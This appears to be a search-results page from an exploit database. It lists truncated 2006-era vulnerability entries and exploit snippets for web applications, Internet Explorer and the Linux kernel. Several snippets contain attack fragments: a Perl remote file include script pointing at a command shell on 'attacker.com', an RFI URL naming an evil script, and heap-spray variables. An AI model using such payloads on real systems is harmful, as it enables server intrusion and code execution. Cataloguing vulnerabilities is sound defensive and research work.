2058 matches found
Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (1)
source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. An attacker could leverage this issue to...
Casinosoft Casino Script 3.2 - config.php SQL Injection
source: https://www.securityfocus.com/bid/20646/info Casinosoft Casino Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue coul...
phpbbplusxl-rfi.txt
!/usr/bin/perl phpBB PlusXL 2.X build 272 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.xs4all.nl/hkicken/plusxl.htm use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END" $socke...
phpmyteam20-rfi.txt
phpMyTeam v2.0 = smileysdir Remote File Include Vulnerability Discovered by XORONturkish hacker...
OlateDownload 3.4 - details.php?page SQL Injection
source: https://www.securityfocus.com/bid/20278/info OlateDownload is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. A...
US-CERT Technical Cyber Security Alert TA06-270A -- Microsoft Internet Explorer WebViewFolderIcon ActiveX Vulnerability
National Cyber Alert System Technical Cyber Security Alert TA06-270A Microsoft Internet Explorer WebViewFolderIcon ActiveX Vulnerability Original release date: September 27, 2006 Last revised: -- Source: US-CERT Systems Affected Microsoft Windows...
Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow
v: behavior: urlVMLRender; var heapSprayToAddress = 0x05050505; var payLoadCode =...
Microsoft Internet Explorer (Windows XP SP2) - VML Remote Buffer Overflow
Microsoft Internet Explorer Windows XP SP2 - VML Remote Buffer Overflow v: behavior: urlVMLRender; var heapSprayToAddress = 0x05050505; var payLoadCode =...
ProgSys <= 0.156 (RR.php) Remote File Include Exploit
Exploit for unknown platform in category web applications ProgSys = 0.156 RR.php Remote File Include Exploit !/usr/bin/perl use LWP::UserAgent; ...
ZilekPortal 1.0 - Haberdetay.asp SQL Injection
source: https://www.securityfocus.com/bid/20062/info ZilekPortal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an...
hotplugCMSconfig.txt
Hello HotPlug CMS Config File Include Vulnerability Discovered by : HACKERS PAL Copyrights : HACKERS PAL Website : WwW.SoQoR.NeT Email : [email protected] After Script Url Add includes/class/config.inc And you will download the config file, so that you will be able to connect by remote connect...
Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)
29\08\06 There are doors I have yet to open windows I have yet to look through Going forward may not be the answer maybe I should go back...
Bad ext3/nfs DoS bug
I've tried contacting the relevant maintainers directly, and it's even in the kernel bugzilla, but nothing's happened and it's been over a month now. No-one seems to be doing anything about this. Is one meant to post this to bugtraq or what? Here's the bug:...
Cisco MARS < 4.2.1 remote compromise
Cisco MARS Monitoring, Analysis and Response System, sometimes referred to as CS-MARS prior to version 4.2.1 ships with an unprotected JBoss installation which ultimately leads to a complete compromise of the device. The caveat here is that, despite much work on Cisco's part, they were not able t...
PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability
No description provided by source. phpforge3b2cfgracine Remote File Inclusion Vulnerability Virangar Security Team www.virangar.org public www.virangar.net priv8 Discovered By : Snake...
Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit
Exploit for linux platform in category local exploits Linux Kernel Example: h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1 if y0u dont have one, make big file 100MB in /tmp with dd and try to junk the cache e.g. cat /usr/lib/ /dev/null / include...
Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability
Flipper Poll = 1.1.0 Remote File Inclusion Vulnerability Discovered By: XORON cont@ct: x0r0nathotmaildotcom Exploit: http://sitename.com/path/poll.php?rootpath=evilscrip...
Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)
No description provided by source. / $Id: raptorprctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ raptorprctl.c - Linux 2.6.x suiddumpable vulnerability Copyright c 2006 Marco Ivaldi [email protected] The suiddumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16...
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit
Exploit for multiple platform in category remote exploits Webmin 1.290 / Usermin 1.220 Arbitrary File Disclosure Exploit ?php / Name : Webmin / Usermin Arbitrary...
Microsoft Internet Explorer 6 - ADODB.Recordset Filter Property Denial of Service
source: https://www.securityfocus.com/bid/18773/info Microsoft Internet Explorer is prone to a denial-of-service condition when processing the 'ADODB.Recordset Filter Property' COM object. A successful attack may cause the browser to fail due to a null-pointer dereference. Microsoft Internet...